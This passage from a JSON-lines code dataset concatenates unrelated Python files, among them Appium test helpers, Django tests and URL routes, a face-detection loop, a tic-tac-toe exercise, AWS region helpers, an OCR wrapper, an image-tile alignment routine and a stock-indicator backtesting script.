return elements\n\n def click(self, locator):\n element = self.find_element(locator)\n element.click()\n\n def clear_key(self, locator):\n element = self.find_element(locator)\n element.clear()\n\n def send_keys(self, locator, text):\n element = self.find_element(locator)\n element.clear()\n element.send_keys(text)\n\n def get_text(self,locator):\n element = self.find_element(locator)\n return element.text\n\n\n def tan_chuan(self):\n ivclose_loc = ('id', 'gz.lifesense.weidong.qa:id/ivDialogClose')\n try:\n self.dr.wait_activity('gz.lifesense.weidong.ui.activity.main.MainActivityNew', 1)\n self.click(ivclose_loc)\n print('首页弹窗已关闭')\n except:\n pass\n\n def always_allow(self, number=3):\n for i in range(number):\n loc = (\"xpath\", \"//*[@text='允许']\")\n try:\n e = WebDriverWait(self.dr, 1, 0.5).until(EC.presence_of_element_located(loc))\n e.click()\n except:\n pass\n\n def is_toast_exist(self, text, timeout=2, poll_frequency=0.1):\n try:\n toast_loc = ('xpath', \"//*[contains(@text,'%s')]\" % text)\n if WebDriverWait(self.dr, timeout, poll_frequency).until(EC.presence_of_element_located(toast_loc)):\n return True\n except:\n return False\n\n def screen_shot(self, text):\n base_path = os.path.abspath(os.path.join(os.path.dirname(__file__), \"..\"))\n img_path = os.path.join(base_path, 'report\\\\img\\\\')\n # print(img_path)\n times = time.strftime('%Y%m%d%H%M', time.localtime(time.time()))\n screen_save_path = img_path + times + text + '.png'\n # print(screen_save_path)\n self.dr.get_screenshot_as_file(screen_save_path)\n\n\nif __name__ == '__main__':\n a = Fengzhuang()\n a.screen_shot('ss')\n","sub_path":"app/common/fengzhuang.py","file_name":"fengzhuang.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"152418456","text":"from django.test import TestCase\nfrom django.test.client import Client\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\n\nfrom website.apps.core.models import Language, Source\nfrom website.apps.lexicon.models import Lexicon\nfrom website.apps.pronouns.models import Paradigm, PronounType, Pronoun\nfrom website.apps.pronouns.tools import full_repr_row\n\nfrom website.apps.pronouns.tests import DefaultSettingsMixin\n\n\nclass Test_Paradigm(DefaultSettingsMixin, TestCase):\n def setUp(self):\n self.add_fixtures()\n \n def test_repr_no_label(self):\n assert unicode(self.pdm) == 'A'\n\n def test_repr_with_label(self):\n self.pdm.label = 'test'\n self.pdm.save()\n assert unicode(self.pdm) == 'A: test'\n \n def test_have_some_pronoun_types(self):\n assert self.pdm.pronoun_set.count() == 3\n \n def test_prefill(self):\n # make sure the correct number of pronouns is there..\n assert self.pdm.pronoun_set.count() == len(PronounType._generate_all_combinations())\n \n # check the pronouns themselves...\n for comb in PronounType._generate_all_combinations():\n queryset = Pronoun.objects.filter(pronountype=comb)\n assert len(queryset) == 1, 'Got {0} not one'.format(len(queryset))\n \n \n def test_partial_prefill(self):\n # we should have a full complement. 
\n assert self.pdm.pronoun_set.count() == len(PronounType._generate_all_combinations())\n \n # Let's delete some...\n for pron in self.pdm.pronoun_set.all():\n if pron.pronountype.person == '2':\n pron.delete()\n else:\n # modify the stored entries so we can identify them later.\n pron.entries.add(Lexicon.objects.create(\n editor=self.editor, \n source=self.source,\n language=self.lang,\n word=self.word,\n entry=\"old\"\n ))\n pron.save()\n \n # how many should we have deleted\n missing = [_ for _ in PronounType ._generate_all_combinations() if _.person == '2']\n assert len(missing) == 1\n assert self.pdm.pronoun_set.count() == (len(PronounType._generate_all_combinations()) - len(missing))\n \n # re-run prefill\n self.pdm._prefill_pronouns()\n \n # we should now have a full complement again.\n assert self.pdm.pronoun_set.count() == len(PronounType._generate_all_combinations())\n \n for pron in self.pdm.pronoun_set.all():\n if pron.pronountype.person == '2':\n assert pron.entries.count() == 0\n else:\n assert pron.entries.count() == 1\n assert pron.entries.all()[0].entry == 'old'\n \n","sub_path":"website/website/apps/pronouns/tests/test_paradigm.py","file_name":"test_paradigm.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"344278993","text":"# -*- coding: utf-8 -*-\n\nfrom webcam.Webcam import Webcam\nfrom facedetect.Detect import Detect\nfrom compare.Compare import Compare\nimport cv2\n\n\ndef main():\n previous_frame = None\n while True:\n webcam = Webcam()\n frame_resized_grayscale = webcam.captureImage()\n \n if previous_frame != None:\n min_area=(3000/800)*frame_resized_grayscale.shape[1]\n temp=background_subtraction(previous_frame, frame_resized_grayscale, min_area)\n if temp==1:\n detect = Detect()\n detect.detect_faces()\n else:\n print(\"Frame is skipped\")\n \n previous_frame = frame_resized_grayscale\n else:\n detect = Detect()\n detect.detect_faces()\n compare = Compare()\n compare.compareImages()\n \n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"q\"):\n break\n\n\nif __name__ == \"__main__\":\n main()\n \ndef background_subtraction(previous_frame, frame_resized_grayscale, min_area):\n\t\"\"\"\n\tThis function returns 1 for the frames in which the area \n\tafter subtraction with previous frame is greater than minimum area\n\tdefined. \n\tThus expensive computation of human detection face detection \n\tand face recognition is not done on all the frames.\n\tOnly the frames undergoing significant amount of change (which is controlled min_area)\n\tare processed for detection and recognition.\n\t\"\"\"\n\tframeDelta = cv2.absdiff(previous_frame, frame_resized_grayscale)\n\tthresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]\n\tthresh = cv2.dilate(thresh, None, iterations=2)\n\tim2, cnts, hierarchy = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\ttemp=0\n\tfor c in cnts:\n\t\t# if the contour is too small, ignore it\n\t\tif cv2.contourArea(c) > min_area:\n\t\t\ttemp=1\n\treturn temp","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"591963059","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n    path(\"\", views.home, name=\"home_page\"),\n    path(\"new_task/\", views.new_task, name=\"new_task\"),\n    path(\"task_update/\", views.task_update, name=\"task_update\"),\n    path(\"task_view/<int:pk>/\", views.task_view, name=\"task_view\"),\n    path(\"task_delete/<int:pk>/\", views.task_delete, name=\"task_delete\")\n]","sub_path":"django_todo/to_do/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"111217024","text":"\"\"\"\nTic-Tac-Toe, sometimes also known as Xs and Os, is a game for two players \n(X and O) who take turns marking the spaces in a 3×3 grid. The player who \nsucceeds in placing three respective marks in a horizontal, vertical, or \ndiagonal rows (NW-SE and NE-SW) wins the game.\n\nBut we will not be playing this game. You will be the referee for this games \nresults. You are given a result of a game and you must determine if the game \nends in a win or a draw as well as who will be the winner. Make sure to return \n\"X\" if the X-player wins and \"O\" if the O-player wins. If the game is a draw, \nreturn \"D\".\n\nA game's result is presented as a list of strings, where \"X\" and \"O\" are \nplayers' marks and \".\" is the empty cell.\n\nInput: A game result as a list of strings (unicode).\nOutput: \"X\", \"O\" or \"D\" as a string.\nPrecondition:\nThere is either one winner or a draw.\nlen(game_result) == 3\nall(len(row) == 3 for row in game_result)\n\"\"\"\n\ndef checkio(game_result):\n    for row in range(3): #checking rows\n        for a in (\"X\", \"O\"):\n            if game_result[row].count(a) == 3:\n                return a\n    for column in range(3): #checking columns\n        if (game_result[0][column] == game_result[1][column] == game_result[2][column]):\n            if game_result[0][column] != \".\":\n                return game_result[0][column]\n    if ((game_result[1][1] == game_result[0][0] == game_result[2][2]) or\n        (game_result[1][1] == game_result[0][2] == game_result[2][0])):\n        if game_result[1][1] != \".\":\n            return game_result[1][1]\n    return \"D\"\n\nif __name__ == '__main__':\n    #These \"asserts\" using only for self-checking and not necessary for auto-testing\n    assert checkio([\n        \"X.O\",\n        \"XX.\",\n        \"XOO\"]) == \"X\", \"Xs wins\"\n    assert checkio([\n        \"OO.\",\n        \"XOX\",\n        \"XOX\"]) == \"O\", \"Os wins\"\n    assert checkio([\n        \"OOX\",\n        \"XXO\",\n        \"OXX\"]) == \"D\", \"Draw\"\n    assert checkio([\n        \"O.X\",\n        \"XX.\",\n        \"XOO\"]) == \"X\", \"Xs wins again\"\n    print(\"Coding complete? 
Click 'Check' to review your tests and earn cool rewards!\")\n\n","sub_path":"py.checkio/1.Home/4.Xs and Os Referee.py","file_name":"4.Xs and Os Referee.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"506069181","text":"import smbus2\nimport bme280\n\nport = 1\naddress = 0x77\nbus = smbus2.SMBus(port)\n\ncalibration_params = bme280.load_calibration_params(bus, address)\n\ndata = bme280.sample(bus, address, calibration_params)\n\nprint(data.id)\nprint(data.timestamp)\nprint(data.temperature)\n\nprint(data)\n\n\n\n\n\n\n\n\n","sub_path":"bme280/drew.py","file_name":"drew.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"155891227","text":"from setuptools import setup\n\nwith open(\"README.txt\") as f:\n long_description = f.read()\n\nsetup(\n name='ChessCalc',\n version='0.0.1',\n long_description=long_description,\n description='Tournament and league chess manager.',\n license=\"MIT\",\n author='Greg Denyes',\n author_email='Greg.Denyes@gmail.com',\n packages=['ChessCalc'],\n install_requires=[\n 'tkinter',\n 'sqlite3',\n ],\n package_data=['chess.db'],\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: Win',\n ]\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"236966292","text":"#########################################################\n# By Phil Procida #\n#########################################################\nimport random, enchant\n\nwordSuggest = enchant.Dict(\"en_US\")\n\nconsList = ['q','w','r','t','y',\n 'p','s','d','f','g',\n 'h','j','k','l','z',\n 'x','c','v','b','n',\n 'm']\nvowelList = ['a','e','i','o','u']\n\noriginalString = list(input(\"Enter some text: \"))\n\ndef randomChars(uInput):\n stepThru = 0\n while stepThru < len(uInput):\n for x in range(len(uInput)):\n if uInput[x] == ' ':\n stepThru += 1\n elif uInput[x] in vowelList:\n randomAssignChar = random.choice(consList)\n uInput[x] = randomAssignChar\n stepThru += 1\n elif uInput[x] in consList:\n randomAssignChar = random.choice(vowelList)\n uInput[x] = randomAssignChar\n stepThru += 1\n else:\n stepThru += 1\n removeExtra = 0\n while removeExtra < len(uInput):\n newString = ''\n for x in range(len(uInput)):\n newString = newString + uInput[x]\n removeExtra += 1\n return newString\n\nrandomCharString = randomChars(originalString)\n\ndef breakString(uInput):\n randomCharString = uInput.split()\n stepThru = 0\n newWordList = ''\n while stepThru < len(randomCharString):\n for x in range(len(randomCharString)):\n newWord = wordSuggest.suggest(randomCharString[x])\n if stepThru == 0:\n newWordList = newWord[0]\n stepThru+= 1\n else:\n newWordList = newWordList + ' ' + newWord[0]\n stepThru += 1\n return newWordList\n\ntry:\n finalString = breakString(randomCharString)\n print(\"Randomly rolled string(s): \" + str(randomCharString))\n print(\"New output(s): \" + str(finalString))\nexcept IndexError:\n print(\"PyEnchant could not find words similar to all of the rolled strings. 
Please try again.\")\n","sub_path":"gibberish machine.py","file_name":"gibberish machine.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"334310983","text":"import boto3\nfrom cloudlift.exceptions import UnrecoverableException\n\nfrom cloudlift.config import EnvironmentConfiguration\nfrom cloudlift.config.logging import log_err\n\ndef get_region_for_environment(environment):\n if environment:\n return EnvironmentConfiguration(environment).get_config()[environment]['region']\n else:\n # Get the region from the AWS credentials used to execute cloudlift\n aws_session = boto3.session.Session()\n return aws_session.region_name\n\n\ndef get_client_for(resource, environment):\n return boto3.session.Session(\n region_name=get_region_for_environment(environment)\n ).client(resource)\n\n\ndef get_resource_for(resource, environment):\n return boto3.session.Session(\n region_name=get_region_for_environment(environment)\n ).resource(resource)\n\n\ndef get_notifications_arn_for_environment(environment):\n try:\n return EnvironmentConfiguration(\n environment\n ).get_config()[environment]['environment'][\"notifications_arn\"]\n except KeyError:\n raise UnrecoverableException(\"Unable to find notifications arn for {environment}\".format(**locals()))\n\n\ndef get_ssl_certification_for_environment(environment):\n try:\n return EnvironmentConfiguration(\n environment\n ).get_config()[environment]['environment'][\"ssl_certificate_arn\"]\n except KeyError:\n raise UnrecoverableException(\"Unable to find ssl certificate for {environment}\".format(**locals()))\n","sub_path":"cloudlift/config/region.py","file_name":"region.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"132326102","text":"import matplotlib.pyplot as plt\nfrom PIL import Image\n\nfrom vietocr.tool.predictor import Predictor\nfrom vietocr.tool.config import Cfg\nimport cv2\n\n\nclass OCR:\n def __init__(self,config_name=\"vgg_transformer\"):\n config = Cfg.load_config_from_name(config_name)\n # config['weights'] = 'https://drive.google.com/uc?id=13327Y1tz1ohsm5YZMyXVMPIOjoOA0OaA'\n config['cnn']['pretrained']=True\n config['device'] = 'cuda:0'\n config['predictor']['beamsearch']=False\n self.detector = Predictor(config)\n \n def predict(self,img):#cv2\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n img = Image.fromarray(img)\n s = self.detector.predict(img)\n return s\n\n\nif __name__ == \"__main__\":\n x=OCR()\n img=cv2.imread(\"a.png\")\n s=x.predict(img)\n print(s)\n","sub_path":"Vocr.py","file_name":"Vocr.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"604765294","text":"import json\nfrom multiprocessing import Pool\nfrom concurrent.futures import ThreadPoolExecutor\nimport tifffile\nimport cv2\nimport numpy as np\nimport os\nimport sys\nimport math\n\n\n\n\n# p1='Tile06'\n# p2='Tile06'\n# left_up_path = 'C:/Users/admin/Documents/WXWork/1688850447417369/Cache/File/2022-02/pavelData_Tile06_YZ_MIP.tif'\n# right_down_path = 'C:/Users/admin/Documents/WXWork/1688850447417369/Cache/File/2022-02/pavelData_Tile07_YZ_MIP.tif'\n# tt_path = 'C:/Users/admin/Documents/WXWork/1688850447417369/Cache/File/2022-02/pavelData_Tile08_YZ_MIP.tif'\n# ttt_path = 'C:/Users/admin/Documents/WXWork/1688850447417369/Cache/File/2022-02/pavelData_Tile09_YZ_MIP.tif'\n# x_base = 
0\n# y_base = 0\n# x_shift_range = 60\n# y_shift_range = 20\n\n\ndef get_shift(p1, p2, path1, path2, x_base, y_base, x_shift_range, y_shift_range):\n print(path1)\n print(path2)\n img1 = cv2.imread(path1, -1)\n img2 = cv2.imread(path2, -1)\n\n\n # print(img1.shape)\n #\n # mean = (np.mean(img1) + np.mean(img2))/2\n # print(mean)\n # mean = int(mean + 0.5*math.sqrt(np.sum(np.square(img1-mean)+np.square(img2-mean))/2/(img1.shape[0]*img1.shape[1])))\n # print(mean)\n #\n # cv2.threshold(img1, mean, 65535, cv2.THRESH_BINARY, img1)\n # cv2.threshold(img2, mean, 65535, cv2.THRESH_BINARY, img2)\n\n # img1_t = np.zeros(img1.shape,np.uint8)\n # img2_t = np.zeros(img2.shape, np.uint8)\n # cv2.threshold(img1,mean,255,cv2.THRESH_BINARY,img1_t)\n # cv2.threshold(img2,mean,255,cv2.THRESH_BINARY,img2_t)\n # cv2.imwrite(tt_path,img1_t)\n # img1_t_t = cv2.distanceTransform(img1_t,1,3)\n # img2_t_t = cv2.distanceTransform(img2_t,1,3)\n # cv2.imwrite(ttt_path, img1_t_t)\n # # cv2.threshold(img1,mean,1,cv2.THRESH_BINARY,img1_t)\n # # cv2.threshold(img2,mean,1,cv2.THRESH_BINARY,img2_t)\n # img1 = img1_t_t\n # img2 =img2_t_t\n # # img1 = img1_t\n # # img2 = img2_t\n # #img1 = img1 * img1_t * img1_t_t\n # #img2 = img2 * img2_t * img2_t_t\n # #img1 = (img1*65536/(np.max(img1)-np.min(img1))).astype(np.uint16)\n # #img2 = (img2 * 65536 / (np.max(img2) - np.min(img2))).astype(np.uint16)\n\n max = sys.maxsize\n loc = (0, 0)\n\n for i in range(-x_shift_range, x_shift_range+1):\n for j in range(-y_shift_range, y_shift_range+1):\n\n temp_loc_x = x_base + i\n temp_loc_y = y_base + j\n if temp_loc_x > 0:\n if temp_loc_y > 0:\n temp_l = img1[temp_loc_x:img1.shape[0], temp_loc_y:img1.shape[1]]\n temp_r = img2[0:img2.shape[0] - temp_loc_x, 0:img2.shape[1] - temp_loc_y]\n else:\n temp_l = img1[temp_loc_x:img1.shape[0], 0:img1.shape[1] + temp_loc_y]\n temp_r = img2[0:img2.shape[0] - temp_loc_x, -temp_loc_y:img2.shape[1]]\n else:\n if temp_loc_y > 0:\n temp_l = img1[0:img1.shape[0] + temp_loc_x, temp_loc_y:img1.shape[1]]\n temp_r = img2[-temp_loc_x:img2.shape[0], 0:img2.shape[1] - temp_loc_y]\n else:\n temp_l = img1[0:img1.shape[0] + temp_loc_x, 0:img1.shape[1] + temp_loc_y]\n temp_r = img2[-temp_loc_x:img2.shape[0], -temp_loc_y:img2.shape[1]]\n\n temp_max = np.sum(np.square(temp_l - temp_r)) / 1.0 / temp_l.shape[0] / temp_l.shape[1]\n # print(temp_max)\n # print((temp_loc_x, temp_loc_y))\n\n if temp_max < max:\n max = temp_max\n loc = (p1, p2, temp_loc_x, temp_loc_y)\n print(loc)\n return loc\n\n\n# a = get_shift(p1,p2,left_up_path, right_down_path, y_base, x_base, y_shift_range, x_shift_range)\n# print(a)\n\n\nif __name__ == '__main__':\n json_env = \"F:/ZhaoHuImages/AI_denoise/Zhaohu_StitchCode/tiles_position.json\" # 参数文件\n with open(json_env, 'r')as fp:\n json_data = json.load(fp)\n # print(json_data)\n input_folder = json_data['input_folder']\n xy_result_file = json_data['xy_result_file']\n locations = json_data['locations']\n # tiles_names = json_data['tiles_names']\n x_length = int(json_data['x_length'])\n y_length = int(json_data['y_length'])\n shift_x_P = int(json_data['shift_x_P'])\n shift_y_P = int(json_data['shift_y_P'])\n shift_x_P_d = int(json_data['shift_x_P_d'])\n shift_y_P_d = int(json_data['shift_y_P_d'])\n shift_x_P_d_ = int(json_data['shift_x_P_d_'])\n shift_y_P_d_ = int(json_data['shift_y_P_d_'])\n shift_z_P_d_ = int(json_data['shift_z_P_d_'])\n thread_num = int(json_data['thread_num'])\n locations = np.asarray(locations)\n\n json_env = 'F:/ZhaoHuImages/AI_denoise/Zhaohu_StitchCode/Z_shift.json'\n with 
open(json_env, 'r')as fp:\n json_data = json.load(fp)\n\n json_data = json_data[\"result_z_s\"]\n\n NNN = 201 # 共126层 源数据\n\n\n\n\n # p = Pool(thread_num)\n # res_l = []\n # for i in range(locations.shape[0]):\n # for j in range(locations.shape[1]):\n # if locations[i][j] != 'None':\n # if i < locations.shape[0] - 1 and locations[i + 1][j] != 'None':\n # res = p.apply_async(get_shift, args=(locations[i][j],\n # locations[i + 1][j],\n # input_folder + '/' + locations[i][\n # j] + '_' + 'XZ' + '_MIP_' + 'D.tif',\n # input_folder + '/' + locations[i + 1][\n # j] + '_' + 'XZ' + '_MIP_' + 'U.tif',\n # 0,\n # 0,\n # shift_z_P_d_,\n # shift_x_P_d_,))\n # res_l.append(res)\n # if j < locations.shape[1] - 1 and locations[i][j + 1] != 'None':\n # res = p.apply_async(get_shift, args=(locations[i][j],\n # locations[i][j + 1],\n # input_folder + '/' + locations[i][\n # j] + '_' + 'YZ' + '_MIP_' + 'R.tif',\n # input_folder + '/' + locations[i][\n # j + 1] + '_' + 'YZ' + '_MIP_' + 'L.tif',\n # 0,\n # 0,\n # shift_z_P_d_,\n # shift_y_P_d_,))\n # res_l.append(res)\n # result_z_s = []\n # for res in res_l:\n # result_z_s.append(res.get())\n\n p = Pool(thread_num)\n res_l = []\n\n\n\n for i in range(locations.shape[0]):\n for j in range(locations.shape[1]):\n if locations[i][j] != 'None':\n # print(input_folder+'/'+'Region 1_'+locations[i][j]+'_z100_RAW_ch00.tif')\n if i df.HA_open, 1, -1)\n# ema21HA = df['EMA_21HA'] = ta.ema( df.HA_close, length=21, append=True)\nema9 = df.ta.ema(length=9, append=True)\nema21 = df.ta.ema(length=21, append=True)\nema42 = df.ta.ema(length=42, append=True)\nema50 = df.ta.ema(length=50, append=True)\nema100 = df.ta.ema(length=100, append=True)\nema150 = df.ta.ema(length=150, append=True)\nkeltner = df.ta.kc(append=True)\npsar = df.ta.psar( append=True)\nsar = df['SAR'] = ft.TA.SAR(df)\ndf['signal_SQ2gauss']= ft.TA.SQZMI(df).apply(lambda x: -1 if x else 0)\ndf['signal_trTTM'] = df.ta.ttm_trend(append=True)\n\n# df['signal_decreasing'] = df.ta.decreasing(length=8).apply(lambda x: -1 if x==1 else x)\n# df['signal_increasing'] =df.ta.increasing(length=8)\nlength = 3\ndf['signal_IDClose'] = df.ta.decreasing(close=df.HA_close, length=length, strict=True).apply(lambda x: -1 if x==1 else x) + df.ta.increasing(close=df.HA_close,length=length, strict=True)\ndf['signal_IDhigh'] = df.ta.decreasing(close=df.HA_high, length=length, strict=True).apply(lambda x: -1 if x==1 else x) + df.ta.increasing(close=df.HA_high,length=length, strict=True)\n\n# Exit Chandelier\nchandelier = ft.TA.CHANDELIER(df, long_period=15, short_period=15)\ndf['chxLong'], df['chxShort'] = chandelier['Long.'], chandelier['Short.']\ndf['chxLong'] = np.where(df['chxLong'] >= df['close'], np.NaN, df['chxLong'])\ndf['chxShort']= np.where(df['chxShort'] < df['close'], np.NaN, df['chxShort'])\ndf['signal_sChandelierS'] = np.where(df['chxShort'] > 0, -1, 1) # first hint of red\n# df['signal_chandelierL'] = np.where(df['chxLong'] > 0, 1, -1)\n\n\n# New Squeeze (black dots) : 1 = ON, 0 = OFF (for 'in_squeeze')\ndef in_squeeze(df):\n if df['BBL_5_2.0'] > df['KCLe_20_2'] and df['BBU_5_2.0'] < df['KCUe_20_2'] :\n return 1\ndef out_squeeze(df):\n if not (df['BBL_5_2.0'] > df['KCLe_20_2'] and df['BBU_5_2.0'] < df['KCUe_20_2']):\n return 1\ndf['squeeze_on'] = df.apply(in_squeeze, axis=1)\ndf['squeeze_off'] = df.apply(out_squeeze, axis=1)\n\n\nmpfdf_columns = list(df.columns)\n\n################################# MAIN AlGO and SIGNAL GENERATION #####################################\n\n# add psar signal -1 0 +1\ndf['signal_lsPSAR'] = 
df['PSARl_0.02_0.2'].apply(lambda x: 1 if x>0 else -1)\ndf['rPSAR'] = df['PSARr_0.02_0.2'].apply(lambda x: -8 if x==True else 0)\n\ndef rPSAR (df):\n if df['PSARl_0.02_0.2'] > 0 and df['PSARr_0.02_0.2'] : return 9\n elif df['PSARs_0.02_0.2'] > 0 and df['PSARr_0.02_0.2'] : return -9\n else : return 0\n\ndf['signal_rPSAR'] = df[['PSARl_0.02_0.2', 'PSARs_0.02_0.2', 'PSARr_0.02_0.2' ]].apply(rPSAR, axis=1)\n# df[['signal_rPSAR', 'signal_rPSAR']].tail(50)\n\ndf['signal_sSAR'] = np.where (df['SAR'] df.EMA_21) &\n (df.EMA_21 > df.EMA_50) &\n (df.EMA_50 > df.EMA_100) &\n (df.EMA_100 > df.EMA_150)\n ,1, np.where(\n (df.EMA_9 < df.EMA_21) &\n (df.EMA_21 < df.EMA_50) &\n (df.EMA_50 < df.EMA_100) &\n (df.EMA_100 < df.EMA_150), -1, 0))\n\n# define stack EMA Softer:base=21 :: +1: positive bullish, 0:undecided, -1:negative bearish\ndf['signal_StackEMA21'] = np.where(\n # (df.EMA_9 > df.EMA_21) &\n (df.EMA_21 > df.EMA_50) &\n (df.EMA_50 > df.EMA_100) &\n (df.EMA_100 > df.EMA_150)\n ,1, np.where(\n # (df.EMA_9 < df.EMA_21) &\n (df.EMA_21 < df.EMA_50) &\n (df.EMA_50 < df.EMA_100) &\n (df.EMA_100 < df.EMA_150), -1, 0))\n\n## >>>>>>>>>> generate long signal :\n# find 1st change Entry from day1: 0->1 and day2: reconfirmation 1->1 ; Exit 1->0\n\ndf.loc [ ((df['signal_StackEMA'] == 1) & (df['signal_StackEMA'].shift(2) == 0) & (df['signal_StackEMA'].shift(1) == 1)) , 'signalxTrade_StackEMA'] = 1\ndf.loc [ ((df['signal_StackEMA'] == 0) & (df['signal_StackEMA'].shift(1) == 1) ) , 'signalxTrade_StackEMA'] = -1\n# df.loc [ ((df['signal_StackEMA'] == 0) & (df['signal_StackEMA'].shift(2) == 1) & (df['signal_StackEMA'].shift(1) == 0)) , 'signal'] = -1\n## See results:\ndf[ (df.signalxTrade_StackEMA == 1) | (df.signalxTrade_StackEMA == -1)] [['signalxTrade_StackEMA', 'close']]\n\n# df['signal'] = ((df['signal_StackEMA'] == 1) & (df['signal_StackEMA'].shift(2) == 0) & (df['signal_StackEMA'].shift(1) == 1)) # return on DF bool\n\n\n########################### BACK TEST ###########################\n\n## >>>>>>>>>> Run a Back Test and Display results :\ndef BackTester_Long (dfr, signal_col): # Entry +1 : Exit -1 ; Hold = 0 or None\n\n df = dfr.copy() # create copy or else will rename original column name\n df.rename(columns = { signal_col: 'signal' }, inplace = True)\n\n sessionpoints = np.where((df.signal == 1) | ( df.signal==-1))\n # sessionpoints = df.loc[(df.signal == 1) | ( df.signal==-1)]\n ## check df consistency: df.iloc[sessionpoints][['signal', 'close']]\n\n in_sessionLong = False;\n start_long = None\n start_long_date = None\n exit_long = None\n exit_long_date = None\n\n analysisDF = pd.DataFrame(columns = ['En', 'Ex', 'EnPrice','ExPrice', 'ReturnPer' ])\n\n for item in sessionpoints[0] :\n close_price = df.iloc[item].close\n signal = df.iloc[item].signal\n if (not in_sessionLong) and signal == 1:\n in_sessionLong = True\n start_long = close_price\n start_long_date = df.index[item]\n\n\n elif in_sessionLong and signal == -1 :\n exit_long = close_price\n exit_long_date = df.index[item]\n per_return = 100*(exit_long - start_long )/start_long\n delta_days = (exit_long_date - start_long_date)\n\n analysisDF = analysisDF.append ({\n 'En' : start_long_date,\n 'Ex' : exit_long_date,\n 'EnPrice' : start_long,\n 'ExPrice' : exit_long,\n 'ReturnPer' : per_return,\n 'days' : delta_days\n # , 'Signal': signal\n }, ignore_index=True)\n\n # reset vars\n in_sessionLong = False;\n start_long = None\n start_long_date = None\n exit_long = None\n exit_long_date = None\n\n print(analysisDF)\n return analysisDF\n\n\nanalysisDF = 
BackTester_Long(df, 'signalxTrade_StackEMA')\n\n\n\n\n################################### PLOT TTM SQUEEZE & EMA21 ###################################\n\n\ndef long_signal_entry(signal_series, df):\n\n if signal_series.isnull().values.all() or (1 not in list(signal_series)) : return []\n\n signal = []\n yrange = max(df['high']) - min(df['low'])\n offset = yrange * 0.10 # 2% of range\n for date,value in signal_series.iteritems():\n if value == 1: # buy\n signal.append(df.loc[date].low - offset ) # Put ^ marker below lows\n else:\n signal.append(np.nan)\n return signal\n\n\ndef long_signal_exit(signal_series, df):\n\n if signal_series.isnull().values.all() or (-1 not in list(signal_series)) : return []\n\n signal = []\n yrange = max(df['high']) - min(df['low'])\n offset = yrange * 0.10 # 2% of range\n for date,value in signal_series.iteritems():\n if value == -1: # exit\n signal.append(df.loc[date].high + 1.5 * offset) # Put 'v' marker above highs\n else:\n signal.append(np.nan)\n return signal\n\n\ndef get_reversals(signal_series, df):\n\n if signal_series.isnull().values.all() : return [], []\n\n signal = []\n markercolor = []\n yrange = max(df['high']) - min(df['low'])\n offset = yrange * 0.10 # 2% of range\n for date,value in signal_series.iteritems():\n if value == -9: # reversal bear\n signal.append(df.loc[date].high + 1.5 *offset ) # Put o marker above highs 2x\n markercolor.append('red')\n\n elif value == 9: # reversal bull\n signal.append(df.loc[date].high + 1.5* offset ) # Put o marker above highs 1x\n markercolor.append('green')\n else:\n signal.append(np.nan)\n markercolor.append('None')\n\n return signal, markercolor\n\n\ndef get_sessions_long(analysisDF, df):\n df = df.copy()\n sessions = []\n sessioncolors = []\n sessionReturns = []\n df['ReturnPlaceholder'] = np.nan\n df['ReturnMarker'] = None\n\n yrange = max(df['high']) - min(df['low'])\n # offset = yrange * 0.10 # 2% of range\n\n print ('received range', df.index[0], df.index[-1])\n print ('df length', len(df))\n\n dfRange = df.index[0], df.index[-1]\n\n for i in analysisDF.itertuples():\n # Examaple seq of points\n # [('2021-03-22',25),('2021-03-29',25)] # test\n en, ex, ret = i.En, i.Ex, i.ReturnPer\n # print (en,ex,ret)\n\n if ( en>=dfRange[0] and ex<=dfRange[1]):\n pmax = max( df[en : ex].high )\n pmin = min( df[en : ex].low )\n\n # value = pmax + 0.1 * ( pmax - pmin) # 10% above high to low range\n value = pmax + yrange*0.05 # 10% offset\n\n sessions.append([(en, value), (ex,value)])\n sessioncolors.append ('green' if ret > 0 else 'red' )\n # sessionReturns.append(ret)\n df.loc[ex, 'ReturnMarker'] = '$+' + str ( round(ret,1)) + '$' if ret > 0 else '$' + str ( round(ret,1)) + '$'\n\n df.loc[ex, 'ReturnPlaceholder'] = pmax + + yrange*0.10\n # print (en,ex,ret, value)\n\n # for date,value in signal_series.iteritems():\n # if value == -1: # buy\n # signal.append(price[date]*1.01) # Put marker below\n # else:\n # signal.append(np.nan)\n sessionReturns = df[['ReturnPlaceholder', 'ReturnMarker']]\n # print (sessionReturns) # check return marker dataframe # test\n return sessions, sessioncolors, sessionReturns\n\n\n# mpf.plot()\ndef plot (df, start=-100, end=None, ctype='candle', analysis=None, addSignal=False, addAlgo=False, session=False, ha=False, 